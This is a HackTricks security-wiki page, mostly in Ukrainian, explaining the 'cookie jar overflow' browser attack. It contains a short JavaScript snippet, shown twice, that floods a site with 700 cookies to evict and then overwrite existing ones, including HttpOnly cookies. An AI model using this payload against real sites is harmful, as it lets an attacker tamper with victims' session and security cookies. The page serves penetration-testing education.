Cookie Jar Overflow

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Браузери мають обмеження на кількість кукі , які вони можуть зберігати для сторінки. Тоді, якщо з якоїсь причини вам потрібно зробити кукі невидимими, ви можете переповнити банку кукі , оскільки найстаріші з них будуть видалені першими:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Зверніть увагу, що сторонні куки, які вказують на інший домен, не будуть перезаписані.

Цей напад також можна використовувати для перезапису HttpOnly куків, оскільки ви можете видалити їх, а потім скинути з потрібним вам значенням.

Перевірте це в цьому пості з лабораторією.

Вчіться та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Вчіться та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримати HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousCookie Tossing NextCookie Bomb

Last updated 6 days ago

// Set many cookies for (let i = 0; i < 700; i++) { document.cookie = `cookie${i}=${i}; Secure`; } // Remove all cookies for (let i = 0; i < 700; i++) { document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`; }